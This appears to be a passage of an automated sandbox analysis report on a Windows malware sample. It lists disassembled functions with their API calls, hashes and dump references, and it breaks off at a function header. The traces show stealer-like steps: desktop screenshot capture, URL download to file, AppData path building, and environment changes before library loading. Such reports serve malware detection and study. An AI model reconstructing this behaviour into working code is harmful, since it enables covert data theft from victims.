                            Function 00D7EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7EFE4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F012
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D7F026
                            • lstrlen.KERNEL32(00000000), ref: 00D7F035
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00D7F053
                            • StrStrA.SHLWAPI(00000000,?), ref: 00D7F081
                            • lstrlen.KERNEL32(?), ref: 00D7F094
                            • lstrlen.KERNEL32(00000000), ref: 00D7F0B2
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00D7F0FF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00D7F13F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 8125e6a443a755a9210f1453879a79bc459133acdb741d5e765a3b457f1cd4f7
                            • Instruction ID: a58a91f8882b6862b0078446aa3d2c37cb666b215b536c49f771250f386ff81d
                            • Opcode Fuzzy Hash: 8125e6a443a755a9210f1453879a79bc459133acdb741d5e765a3b457f1cd4f7
                            • Instruction Fuzzy Hash: EB517A31A516059FCB31EB78DC59ABE77B5EF55304F098469FC4A9B212EA70DC028BB0
                            Function 00D6A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(00BF8E30,00F99BD8,0000FFFF), ref: 00D6A026
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6A053
                            • lstrlen.KERNEL32(00F99BD8), ref: 00D6A060
                            • lstrcpy.KERNEL32(00000000,00F99BD8), ref: 00D6A08A
                            • lstrlen.KERNEL32(00D94C4C), ref: 00D6A095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6A0B2
                            • lstrcat.KERNEL32(00000000,00D94C4C), ref: 00D6A0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6A0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6A0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6A114
                            • SetEnvironmentVariableA.KERNEL32(00BF8E30,00000000), ref: 00D6A12F
                            • LoadLibraryA.KERNEL32(00BFDC20), ref: 00D6A143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: c0580e130075000b1cda6ecfec946daa5f72ea915267a9aa8d7190bac95cf4b8
                            • Instruction ID: f166daaa727b5f56b30adae461904ad1989e300c92e11c54d960cc6106773edb
                            • Opcode Fuzzy Hash: c0580e130075000b1cda6ecfec946daa5f72ea915267a9aa8d7190bac95cf4b8
                            • Instruction Fuzzy Hash: 11911430600A048FD730AFACDC54A6637B5EB99705F48401AE9469B262EFB5CD85DFB2
                            Function 00D7C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7C8A2
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7C8D1
                            • lstrlen.KERNEL32(00000000), ref: 00D7C8FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7C932
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D7C943
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 2346197d67237b3114a6c7e20d165e520b5ceba03e0d61cfeee7275d421953ce
                            • Instruction ID: 81f3a9ecfe951bfe08eab27b050c33d7b862c240b8435f81447506fe017b8865
                            • Opcode Fuzzy Hash: 2346197d67237b3114a6c7e20d165e520b5ceba03e0d61cfeee7275d421953ce
                            • Instruction Fuzzy Hash: 3E61B071E216199FDB20EFB4C845AAE7BF8FF09345F08946EE845E7201E77489058BB0
                            Function 00D841E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00D80CF0), ref: 00D84276
                            • GetDesktopWindow.USER32 ref: 00D84280
                            • GetWindowRect.USER32(00000000,?), ref: 00D8428D
                            • SelectObject.GDI32(00000000,00000000), ref: 00D842BF
                            • GetHGlobalFromStream.COMBASE(00D80CF0,?), ref: 00D84336
                            • GlobalLock.KERNEL32(?), ref: 00D84340
                            • GlobalSize.KERNEL32(?), ref: 00D8434D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 0f61afda42852f2d0aa46a6b68dfb4a53923cfd3425454e7137eb3e01ed37172
                            • Instruction ID: a3df088500838bca11b6c415f1f80dba19b89b776146eaa505319ddcb38eb2f2
                            • Opcode Fuzzy Hash: 0f61afda42852f2d0aa46a6b68dfb4a53923cfd3425454e7137eb3e01ed37172
                            • Instruction Fuzzy Hash: 41513C75A1020DAFDB10EFA4DC89AEEB7B9EF48344F14441AF905E3250DB74AD019BA0
                            Function 00D7DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,00BFE1C8), ref: 00D7E00D
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7E037
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E07D
                            • lstrcat.KERNEL32(?,?), ref: 00D7E098
                            • lstrcat.KERNEL32(?,?), ref: 00D7E0AC
                            • lstrcat.KERNEL32(?,00BEC000), ref: 00D7E0C0
                            • lstrcat.KERNEL32(?,?), ref: 00D7E0D4
                            • lstrcat.KERNEL32(?,00BFDC00), ref: 00D7E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D7E126
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: 4451bd43f01394d60e9d37b5d12dffbf70af6b2dc871b440e25b431f2e3cd620
                            • Instruction ID: e6a9f4b2000b86ca22f89846cca6e8aaa4aa4f7ab2c99b9192be5114ad9f0978
                            • Opcode Fuzzy Hash: 4451bd43f01394d60e9d37b5d12dffbf70af6b2dc871b440e25b431f2e3cd620
                            • Instruction Fuzzy Hash: 19619F7191011CEBCB15DB64CC55AEDB7B8FF4C300F5489A9AA09A3250EBB09F859FA0
                            Function 00D66AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D66AFF
                            • InternetOpenA.WININET(00D8CFEC,00000001,00000000,00000000,00000000), ref: 00D66B2C
                            • StrCmpCA.SHLWAPI(?,00BFE7E0), ref: 00D66B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00D66B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D66B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00D66BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D66BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00D66BF0
                            • CloseHandle.KERNEL32(00000000), ref: 00D66C10
                            • InternetCloseHandle.WININET(00000000), ref: 00D66C17
                            • InternetCloseHandle.WININET(?), ref: 00D66C21
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: a96d746ccf5ddbadda1b8c719893893285ec28dcb9e57528819cfbe4610cca85
                            • Instruction ID: 57ff9bba7aa4ef28082e228ff3472c85163581ae4ef8a0d9d277249d8badeff8
                            • Opcode Fuzzy Hash: a96d746ccf5ddbadda1b8c719893893285ec28dcb9e57528819cfbe4610cca85
                            • Instruction Fuzzy Hash: 45418E71A40209ABEB20DF68DC49FAE77B8EB44744F044459FA05E7290EF70EE459BB4
                            Function 00D6BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6BC1F
                            • lstrlen.KERNEL32(00000000), ref: 00D6BC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6BC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6BC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6BCAC
                            • lstrlen.KERNEL32(00D94AD4), ref: 00D6BD23
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 721c4097df38ca59e6586294c8b471c5f6ca054365263f3b4227d4dd897b996b
                            • Instruction ID: 5fa0a86566bbce9fb4c9fb233a778dd9cc765e5dab033c195862a1ca818b2c54
                            • Opcode Fuzzy Hash: 721c4097df38ca59e6586294c8b471c5f6ca054365263f3b4227d4dd897b996b
                            • Instruction Fuzzy Hash: 49A17C30A116098FCB25EF68D949A6EB7B4EF44314F1D806AE406DB261DB72DD82CF70
                            Function 00D85EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85F2A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85F49
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00D86014
                            • memmove.MSVCRT(00000000,00000000,?), ref: 00D8609F
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D860D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: 80c7fd20408e0b2988a72c0254b49621a17bea23ce860a1101c8a01363a01885
                            • Instruction ID: d098b13bd082ef3b20e2e3936168594b16676fbf539b6830527cc8851f85713b
                            • Opcode Fuzzy Hash: 80c7fd20408e0b2988a72c0254b49621a17bea23ce860a1101c8a01363a01885
                            • Instruction Fuzzy Hash: D5619D70700644DBDB28EF5CD894A6EB3F6EF84314B244A59E5928B385D731ED808BB9
                            Function 00D7E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E07D
                            • lstrcat.KERNEL32(?,?), ref: 00D7E098
                            • lstrcat.KERNEL32(?,?), ref: 00D7E0AC
                            • lstrcat.KERNEL32(?,00BEC000), ref: 00D7E0C0
                            • lstrcat.KERNEL32(?,?), ref: 00D7E0D4
                            • lstrcat.KERNEL32(?,00BFDC00), ref: 00D7E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D7E126
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 30afe74b5ab37d4065d2ab3191cab44ec6f7af091d7f3d148f32cc2341bbc1b4
                            • Instruction ID: 5656e1be906a42d09d2d985eb9ef727698726ddc08981d2e97739c3c936591bb
                            • Opcode Fuzzy Hash: 30afe74b5ab37d4065d2ab3191cab44ec6f7af091d7f3d148f32cc2341bbc1b4
                            • Instruction Fuzzy Hash: DC418F7191151C9BCB25EB64DC49AED73B4FF48300F4489A9FA1A93251EBB09F858FB0
                            Function 00D67A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
